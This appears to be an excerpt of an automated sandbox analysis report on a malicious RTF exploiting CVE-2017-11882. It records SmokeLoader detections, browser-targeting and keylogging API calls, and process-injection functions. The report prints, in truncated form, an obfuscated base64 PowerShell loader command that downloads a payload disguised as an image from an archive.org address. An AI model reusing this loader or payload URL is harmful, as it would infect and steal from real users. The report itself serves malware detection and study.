            Source: explorer.exe, 0000000C.00000000.375066007.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375317134.0000000007967000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.629766627.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375066007.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374893412.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 0000000C.00000002.629766627.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374893412.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
            Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000007.00000002.363808831.0000000002629000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org
            Source: powershell.exe, 00000007.00000002.363583798.00000000002C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366421069.0000000004F59000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.363633576.00000000005B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
            Source: powershell.exe, 00000005.00000002.368085766.0000000002B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240LR
            Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
            Source: E2E3.tmp.19.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected SmokeLoader
            Source: Yara matchFile source: 00000019.00000002.628348956.0000000000061000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2840, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2836, type: MEMORYSTR
            Source: Yara matchFile source: 7.2.powershell.exe.2878da8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_0008162B GetKeyboardState,ToUnicode,26_2_0008162B

            E-Banking Fraud

            barindex
            Checks if browser processes are running
            Source: C:\Windows\SysWOW64\explorer.exeCode function: StrStrIA, chrome.exe|opera.exe|msedge.exe22_2_00082EA8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe22_2_00083862

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Very long command line found
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9402
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9402Jump to behavior
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00402F5D RtlCreateUserThread,NtTerminateProcess,10_2_00402F5D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_004014BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,10_2_00402321
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004025D3 NtClose,10_2_004025D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_004014D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,10_2_004022D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,10_2_004022D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,10_2_004022E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_004014E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_004014EB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,10_2_004022F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00402686 NtClose,10_2_00402686
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040328D GetModuleHandleA,Sleep,MapViewOfFile,LocalAlloc,OpenProcessToken,NtOpenKey,wcsstr,10_2_0040328D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004030BF RtlCreateUserThread,NtTerminateProcess,10_2_004030BF
            Source: C:\Windows\explorer.exeCode function: 12_2_02802FAC NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,12_2_02802FAC
            Source: C:\Windows\explorer.exeCode function: 12_2_02804760 NtCreateSection,12_2_02804760
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C4B92 RtlMoveMemory,NtUnmapViewOfSection,19_2_000C4B92
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C33C3 NtQueryInformationFile,19_2_000C33C3
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C342B NtQueryObject,NtQueryObject,RtlMoveMemory,19_2_000C342B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,19_2_000C349B
